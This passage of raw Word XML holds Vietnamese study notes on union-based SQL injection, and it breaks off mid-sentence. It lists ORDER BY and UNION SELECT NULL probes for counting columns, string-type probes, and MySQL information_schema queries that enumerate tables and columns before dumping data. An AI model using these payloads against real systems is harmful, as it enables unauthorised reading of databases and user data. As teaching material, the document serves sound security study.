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05C53" w14:textId="7F82D41D" w:rsidR="00EA5A55" w:rsidRDefault="00897FB5" w:rsidP="00897FB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Các kiểu injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59104A14" w14:textId="05C668F8" w:rsidR="00897FB5" w:rsidRDefault="00897FB5" w:rsidP="00897FB5">
      <w:r>
        <w:t xml:space="preserve">Sql injection là gì: </w:t>
      </w:r>
      <w:r w:rsidRPr="00897FB5">
        <w:t>SQL injection là một lỗ hổng bảo mật web cho phép kẻ tấn công can thiệp vào các truy vấn mà ứng dụng thực hiện đối với cơ sở dữ liệu của nó. Nó thường cho phép kẻ tấn công xem dữ liệu mà chúng thường không thể lấy được. Điều này có thể bao gồm dữ liệu thuộc về người dùng khác hoặc bất kỳ dữ liệu nào khác mà bản thân ứng dụng có thể truy cập. Trong nhiều trường hợp, kẻ tấn công có thể sửa đổi hoặc xóa dữ liệu này, gây ra những thay đổi liên tục đối với nội dung hoặc hành vi của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250C9D3" w14:textId="6E5FE0B9" w:rsidR="00897FB5" w:rsidRDefault="00897FB5" w:rsidP="00897FB5">
      <w:r>
        <w:t xml:space="preserve">-Union-Based: </w:t>
      </w:r>
      <w:r w:rsidRPr="00897FB5">
        <w:t>Câu lệnh UNION dùng để kết nối 2 mệnh đề SELECT (hỗ trợ cả mysql và mssql). Kẻ tấn công có thể tận dụng câu lệnh này để chèn thêm đoạn truy vấn vào các bảng dữ liệu khác.</w:t>
      </w:r>
      <w:r w:rsidR="007D74A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F536435" w14:textId="10ED0759" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r w:rsidRPr="007D74A1">
        <w:t>Để một UNIONtruy vấn hoạt động, hai yêu cầu chính phải được đáp ứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41760F32" w14:textId="77777777" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Các truy vấn riêng lẻ phải trả về cùng một số cột.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FA524" w14:textId="3531C374" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Các kiểu dữ liệu trong mỗi cột phải tương thích giữa các truy vấn riêng lẻ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123F828" w14:textId="2E4196DD" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t>Xác định số lượng số lượng cột yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24100742" w14:textId="35426B5D" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r w:rsidRPr="007D74A1">
        <w:t>Khi thực hiện một cuộc tấn công SQL injection UNION, có hai phương pháp hiệu quả để xác định có bao nhiêu cột đang được trả về từ truy vấn ban đầu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là sử dụng Order By và phương pháp thứ 2 sử dụng một loạt Union select với các giá trị NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F2750" w14:textId="77777777" w:rsidR="007D74A1" w:rsidRPr="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cách 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A41563" w14:textId="3A0A7EAA" w:rsidR="007D74A1" w:rsidRPr="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43916A2D" w14:textId="45C92FA6" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' ORDER BY 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912398C" w14:textId="725DCF97" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t>Nếu số lượng cột order by vượt quá thì nó sẽ gửi trả về lỗi chẳng hạn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1BF61" w14:textId="558B0015" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r w:rsidRPr="007D74A1">
        <w:t>The ORDER BY position number 3 is out of range of the number of items in the select list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F05FC" w14:textId="46270BA7" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t>Một số trường hợp sẽ gửi các lỗi rõ ràng nhưng đôi khi nó sẽ không gửi thông báo lỗi mà chỉ là các thay đổi nhỏ do đó ta cần phải để ý kỹ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A883DE9" w14:textId="532B2408" w:rsidR="007D74A1" w:rsidRPr="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cách 2:  </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' UNION SELECT NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBD86E" w14:textId="41BF8238" w:rsidR="007D74A1" w:rsidRPr="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NULL,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E649F8" w14:textId="18AA10DB" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NULL,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D74A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1831D0" w14:textId="161485C2" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Nếu số lượng giá trị NULL không khớp với </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cột ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cơ sở dữ liệu trả về lỗi, chẳng hạn như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C16E1" w14:textId="54EA2223" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r w:rsidRPr="007D74A1">
        <w:t>All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C85A9" w14:textId="1056EDFD" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Tương tự </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>với  cách</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1 nó có thể phản hồi lại thông báo lỗi hoặc là không</w:t>
      </w:r>
      <w:r w:rsidR="001936E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4AA3F" w14:textId="346294BF" w:rsidR="001936E0" w:rsidRDefault="001936E0" w:rsidP="007D74A1">
      <w:r>
        <w:t>Ở đây mục đích sử dụng NULL</w:t>
      </w:r>
      <w:r w:rsidR="001B4562">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="001B4562" w:rsidRPr="001B4562">
        <w:t>các kiểu dữ liệu trong mỗi cột phải tương thích giữa truy vấn gốc và truy vấn được chèn. Vì NULLcó thể chuyển đổi thành mọi kiểu dữ liệu thường được sử dụng, việc sử dụng NULLtối đa hóa cơ hội tải trọng sẽ thành công khi số lượng cột là chính xác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD76843" w14:textId="26077954" w:rsidR="00ED158E" w:rsidRDefault="00A70B7B" w:rsidP="007D74A1">
      <w:r>
        <w:t>Tìm kiếm các cột có kiểu dữ liệu chuỗi trong UNION attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C66356" w14:textId="7B620B87" w:rsidR="00A70B7B" w:rsidRDefault="00A70B7B" w:rsidP="007D74A1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thường các kiểu tấn công union</w:t>
      </w:r>
      <w:r w:rsidR="00786BDD">
        <w:t xml:space="preserve"> để có thể truy xuất kết quả từ một truy vấn dữ liệu truy xuất sẽ ở dạng chuỗi, vì vậy cần tìm cột có kiểu dữ liệu chuỗi hoặc tương thích với chuỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61355F" w14:textId="642C4FA6" w:rsidR="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sau khi ta xác định được số cột, ta có thể thăm dò từng cột có chứa kiểu dữ liệu chuỗi không bằng cách chèn ‘a’ vào null. Giả sự có 3 cột</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01488F2D" w14:textId="327F1AAC" w:rsidR="00786BDD" w:rsidRPr="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="00786BDD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' UNION SELECT 'a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>',NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9754F" w14:textId="150FD523" w:rsidR="00786BDD" w:rsidRPr="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="00786BDD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' UNION SELECT NULL,'a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>',NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00070F7C" w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F884D3" w14:textId="435BE09F" w:rsidR="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="00786BDD">
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NULL,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,'a'</w:t>
      </w:r>
      <w:r w:rsidR="00070F7C" w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786BDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC455F" w14:textId="08FF791C" w:rsidR="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00786BDD">
        <w:t>Nếu kiểu dữ liệu của một cột không tương thích với dữ liệu chuỗi, truy vấn được đưa vào sẽ gây ra lỗi cơ sở dữ liệu, chẳng hạn như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD5E25D" w14:textId="02E23F84" w:rsidR="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00786BDD">
        <w:t>Conversion failed when converting the varchar value 'a' to data type int.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB5EBB" w14:textId="7F70766C" w:rsidR="00786BDD" w:rsidRDefault="00786BDD" w:rsidP="007D74A1">
      <w:r>
        <w:t>Mốt số trường hợp sẽ không xảy ra lôi ta có thể xác định được thông qua cách khi chèn ‘a’ vào đúng cột có kiểu dữ liệu chuỗi nó sẽ hiển thị kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C16BB" w14:textId="45D5B12E" w:rsidR="00CF5483" w:rsidRDefault="00CF5483" w:rsidP="007D74A1">
      <w:r>
        <w:t>Ta có thể sử dụng union attack để truy xuất kết quả ta muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB0CFA" w14:textId="00064865" w:rsidR="0097618A" w:rsidRDefault="0097618A" w:rsidP="007D74A1">
      <w:r>
        <w:t>Giả sử ta đã tìm được số cột lỗi và tìm thấy các cột có thể chèn được payload</w:t>
      </w:r>
      <w:r w:rsidR="00DF2F35">
        <w:t>. Lúc này ta chỉ cần tìm các table và sau đó tìm các column và dump data là xong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C140BA8" w14:textId="04E6A5ED" w:rsidR="00DF2F35" w:rsidRDefault="00DF2F35" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Giả sử có 3 cột </w:t>
      </w:r>
      <w:r w:rsidR="00C923BA">
        <w:t>và cột 2 là cột có thể chèn payload</w:t>
      </w:r>
      <w:r w:rsidR="00F51D76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D028E" w14:textId="6DC0D18E" w:rsidR="007D74A1" w:rsidRDefault="007D74A1" w:rsidP="007D74A1">
      <w:r>
        <w:t>Mysql:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19341625" w14:textId="1C5A1012" w:rsidR="00C923BA" w:rsidRDefault="00C923BA" w:rsidP="007D74A1">
      <w:r>
        <w:t>Sử dụng câu lệnh này để lấy các table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102C877" w14:textId="1CB0D06B" w:rsidR="007D74A1" w:rsidRDefault="00DF2F35" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C923BA">
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>_concat(table_name),</w:t>
      </w:r>
      <w:r w:rsidR="00C923BA">
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve"> from information_schema.tables where table_schema = database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46386812" w14:textId="3705BE4C" w:rsidR="00C923BA" w:rsidRDefault="00F51D76" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Giả sử ta thu được 3 table là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users,info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">,data </w:t>
      </w:r>
      <w:r w:rsidR="00C923BA">
        <w:t>Sử dụng câu lệnh này để xem các cột trong bảng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D10A197" w14:textId="1E832D44" w:rsidR="00C923BA" w:rsidRDefault="00C923BA" w:rsidP="007D74A1">
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>_concat(</w:t>
      </w:r>
      <w:r>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>_name),</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve"> from information_schema.</w:t>
      </w:r>
      <w:r>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t>s where table_</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F35">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:t>‘users’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C5A54" w14:textId="617B4107" w:rsidR="00C923BA" w:rsidRDefault="00F51D76" w:rsidP="007D74A1">
      <w:r>
        <w:t xml:space="preserve">Giả sử ta thu được thông tin cột </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
